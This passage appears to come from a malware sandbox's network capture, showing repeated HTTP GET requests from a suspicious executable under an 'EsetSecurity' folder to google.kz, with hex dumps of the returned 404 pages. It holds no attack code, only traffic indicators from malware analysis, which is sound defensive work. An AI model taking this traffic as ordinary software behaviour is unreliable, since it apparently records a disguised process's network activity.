(max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.770752907 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.871093035 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.871179104 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:11.971595049 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:11.971671104 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:12.073755980 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.073901892 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:12.173901081 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:11 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.274272919 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:12 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:12.274764061 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:12.394774914 CET	51	OUT	GET /5N5Gv78Z7d?s=194 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:12.874916077 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:12 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:13.061992884 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:12 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
42	192.168.2.16	49762	172.217.19.164	80	5204	C:\Users\user\AppData\Local\EsetSecurity\tDLozbx48F.exe

Timestamp	Bytes transferred	Direction	Data
Dec 1, 2024 22:52:09.065138102 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:10.713942051 CET	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1571 Date: Sun, 01 Dec 2024 21:52:10 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Dec 1, 2024 22:52:10.713953972 CET	490	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15
Dec 1, 2024 22:52:10.714277983 CET	50	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz
Dec 1, 2024 22:52:10.834327936 CET	500	OUT	GET /SNd3vAWXzu?s=65 HTTP/1.1 Host: google.kz Data Raw: 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 6f 6f 67 6c 65 2e 6b 7a 0d 0a 0d 0a 47 45 54 20 2f 53 4e 64 33 76 41 57 58 7a 75 3f 73 3d 36 35 20 48 54 54 50 2f 31 2e 31 0d 0a 48 6f 73 74 3a 20 67 [TRUNCATED] Data Ascii: GET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kzGET /SNd3vAWXzu?s=65 HTTP/1.1Host: google.kz
